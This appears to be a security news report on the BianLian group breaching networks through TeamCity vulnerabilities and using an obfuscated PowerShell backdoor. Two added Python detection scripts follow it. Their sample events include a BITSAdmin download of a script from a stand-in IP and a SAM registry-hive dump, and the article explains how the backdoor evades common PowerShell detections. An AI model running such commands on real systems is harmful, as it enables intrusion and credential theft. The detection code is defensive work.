The extortion group has reimplemented its Go-based backdoor in PowerShell and is exploiting TeamCity vulnerabilities as an initial access vector.

The BianLian extortion group was recently seen exploiting vulnerabilities in the TeamCity continuous integration server to gain initial access to networks. In the latest attacks the group also deployed a previously unknown backdoor written in PowerShell that appears to be a reimplementation of its older Golang backdoor.

“As we have seen throughout 2023 and into 2024, BianLian continues to prove how they can adapt to a changing environment, especially in regards to the exploitation of emerging vulnerabilities,” researchers from GuidePoint Security said in a new report.

BianLian is a ransomware group that emerged in 2022 and has primarily targeted organizations in the healthcare, manufacturing, professional, and legal services sectors in the US and Europe. The group originally used double extortion tactics, but it switched to operations that involve only data leak extortion after researchers released a decryptor for its file-encrypting program.

TeamCity as initial access vector

According to an analysis by researchers at Palo Alto Networks, BianLian has consistently been among the top 10 data extortion groups, with new victims posted on its leak site every week. The group has used various methods of gaining initial access to networks, including stolen Remote Desktop Protocol (RDP) credentials, exploitation of known vulnerabilities such as ProxyShell, and targeting of VPN providers.

During a recent investigation in a customer environment, GuidePoint’s incident response team determined that BianLian attackers broke in by exploiting a vulnerability in TeamCity, a commercial CI/CD tool developed by JetBrains that is used to automate the building and testing of software code.
Because the logs were missing from the server, the GuidePoint researchers could not determine whether the vulnerability was one of the two critical ones patched by JetBrains last week (CVE-2024-27198) or an older one patched last year (CVE-2023-42793). What is clear is that the exploit allowed the attackers to create new users in TeamCity and execute malicious commands on the underlying system with the privileges of TeamCity’s service account. Native Windows commands were then used to perform additional reconnaissance and discover other software build servers on the network that could be targeted.

“The threat actor leveraged two files, winpty-agent.exe and winpty.dll to the build servers, which are legitimate files for winpty used to create an interface to run Windows commands,” the researchers said. “The threat actor used winpty-agent.exe on the build servers to remotely run commands from the exploited TeamCity server and leveraged BITSAdmin to deploy additional tools, including a malicious PowerShell script, web.ps1, to the server.”

Their attempts to dump credentials from the Windows Security Accounts Manager (SAM) were flagged by the endpoint security monitoring solution and prompted an investigation by incident responders. The investigation revealed that before deploying the PowerShell script, the attackers tried to deploy several DLLs that were quarantined by the local antivirus because they matched Win64/BianDoor.D, a detection signature for the group’s known backdoor written in the Go programming language.

PowerShell reimplementation of the BianLian backdoor

The PowerShell script was highly obfuscated, but the researchers managed to deobfuscate it and analyze its contents. The script had two main functions: one called cakes, which implemented a mechanism for connecting to a command-and-control server using SSL streams and TCP sockets, and another called cookies, which implemented the rest of the backdoor’s execution logic and capabilities.
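The TeamCity-side activity described earlier (commands run under the service account, BITSAdmin pulling tools, winpty-agent.exe on the build servers, the SAM dump attempt) lends itself to a simple correlation over process-creation events. This is an added example, not GuidePoint’s or the group’s code; the CI server’s process name, host names and paths are assumptions.

```python
"""Correlate Windows process-creation events (Sysmon Event ID 1 style) for
the post-exploitation chain described above: commands launched under the CI
server's service account, BITSAdmin pulling tools, winpty-agent.exe running
commands on build servers, and an attempt to save the SAM hive. Added example;
host names, paths and the CI server's parent image name are assumptions."""
from typing import Dict, List, Optional

CI_PARENT = "java.exe"  # assumed image of the TeamCity server process
SHELLS = {"cmd.exe", "powershell.exe", "net.exe"}


def classify(event: dict) -> Optional[str]:
    """Return the name of the rule an event trips, or None."""
    image, parent = event["Image"].lower(), event["ParentImage"].lower()
    cmd = event["CommandLine"].lower()
    if image.endswith("bitsadmin.exe") and "/transfer" in cmd:
        return "bitsadmin_transfer"
    if image.endswith("winpty-agent.exe"):
        return "winpty_agent"
    if image.endswith("reg.exe") and " save " in cmd and "hklm\\sam" in cmd:
        return "sam_hive_save"
    if parent.endswith(CI_PARENT) and image.rsplit("\\", 1)[-1] in SHELLS:
        return "shell_from_ci_service"
    return None


def correlate(events: List[dict]) -> Dict[str, List[str]]:
    """Hosts with two or more distinct rule hits: the multi-stage signal that
    merits escalation rather than single-alert triage."""
    per_host: Dict[str, set] = {}
    for ev in events:
        rule = classify(ev)
        if rule:
            per_host.setdefault(ev["Computer"], set()).add(rule)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= 2}


# Constructed sample events (not from the incident).
SAMPLE_EVENTS = [
    {"Computer": "TC-SRV", "ParentImage": r"C:\TeamCity\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"Computer": "TC-SRV", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job http://203.0.113.5/web.ps1 C:\tmp\web.ps1"},
    {"Computer": "BUILD02", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\tmp\winpty-agent.exe", "CommandLine": "winpty-agent.exe"},
    {"Computer": "BUILD02", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\reg.exe", "CommandLine": r"reg save hklm\sam C:\tmp\s"},
    {"Computer": "DEV-WS", "ParentImage": r"C:\Windows\explorer.exe",  # single hit, benign
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer upd http://intranet/tool.msi C:\tool.msi"},
]
```

Running `correlate(SAMPLE_EVENTS)` reports TC-SRV and BUILD02 and leaves the single-hit DEV-WS transfer for ordinary triage.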
“Perhaps the most interesting component of this whole backdoor was the innovative use of the Runspace Pool in conjunction with the .NET PowerShell.Create() method to invoke a ScriptBlock with asynchronous capabilities, all while leveraging an SSL stream to pass data between the C2 server and the infected system,” the researchers said.

Most malicious PowerShell scripts rely on the Invoke-Command or Invoke-Expression cmdlets to execute commands or code on the system. By avoiding these well-known techniques, BianLian’s script is less likely to be flagged by security products that key on those cmdlets. The Runspace Pool feature is also a more performant way to execute commands asynchronously.

BianLian’s Go backdoor uses digital certificates to authenticate the C2 server, and this behavior is replicated in the PowerShell script. Furthermore, the IP address the script connected to was already flagged as a known C2 server for BianLian’s Go backdoor, reinforcing the attribution to this group.

“Based on these findings of shared infrastructure and AV detections, GRIT assesses with a high confidence that the analyzed PowerShell script is a PowerShell implementation of the BianLian Go backdoor,” the GuidePoint researchers said.
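Because the script sidesteps Invoke-Expression and Invoke-Command, detections that key only on those cmdlets miss it; a script-block-logging heuristic can instead look for the combination the researchers describe (a TcpClient wrapped in an SslStream feeding a RunspacePool and PowerShell.Create()). The following is an added example, not code from the report or the malware; the log entries are constructed.

```python
"""Heuristic scan of PowerShell script-block log text (Event ID 4104 style) for
the execution pattern described in the report: a raw TcpClient wrapped in an
SslStream feeding a RunspacePool and [PowerShell]::Create(), with no
Invoke-Expression or Invoke-Command. Added example; sample entries are
constructed, not taken from the analysed script."""
import re

# Feature groups derived from the behaviour described in the report.
NETWORK = [r"System\.Net\.Sockets\.TcpClient", r"System\.Net\.Security\.SslStream"]
RUNSPACE = [r"RunspaceFactory\]::CreateRunspacePool", r"\[PowerShell\]::Create\(",
            r"\.AddScript\(", r"\.BeginInvoke\("]
CLASSIC = [r"\bInvoke-Expression\b", r"\bIEX\b", r"\bInvoke-Command\b"]


def score_script(text: str) -> dict:
    """Classify one script-block body by the feature groups it contains."""
    def hits(patterns):
        return [p for p in patterns if re.search(p, text, re.IGNORECASE)]

    net, runspace, classic = hits(NETWORK), hits(RUNSPACE), hits(CLASSIC)
    # The report's pattern: TLS socket plus runspace execution and none of the
    # cmdlets most detections key on. A benign parallel-jobs script has only
    # the runspace half; a classic stager has the cmdlets.
    suspicious = len(net) == 2 and len(runspace) >= 2 and not classic
    return {"network": net, "runspace": runspace,
            "classic_exec": classic, "suspicious": suspicious}


def scan_logs(entries: list) -> list:
    """Return ids of log entries whose ScriptBlockText matches the pattern."""
    return [e["id"] for e in entries if score_script(e["ScriptBlockText"])["suspicious"]]


# Constructed sample script-block entries (not real captures).
SAMPLE_ENTRIES = [
    {"id": 1, "ScriptBlockText":  # benign: parallel jobs over a runspace pool
     "$pool = [RunspaceFactory]::CreateRunspacePool(1, 4); $pool.Open(); "
     "$ps = [PowerShell]::Create(); $ps.RunspacePool = $pool; "
     "$ps.AddScript({ Get-Service }); $h = $ps.BeginInvoke()"},
    {"id": 2, "ScriptBlockText":  # classic stager shape: caught by IEX rules
     "$c = New-Object System.Net.Sockets.TcpClient; Invoke-Expression $data"},
    {"id": 3, "ScriptBlockText":  # the report's shape: TLS socket + runspace, no IEX
     "$c = New-Object System.Net.Sockets.TcpClient; "
     "$s = New-Object System.Net.Security.SslStream; "
     "$pool = [RunspaceFactory]::CreateRunspacePool(1, 2); "
     "$ps = [PowerShell]::Create()"},
]

if __name__ == "__main__":
    print("suspicious entries:", scan_logs(SAMPLE_ENTRIES))  # [3]
```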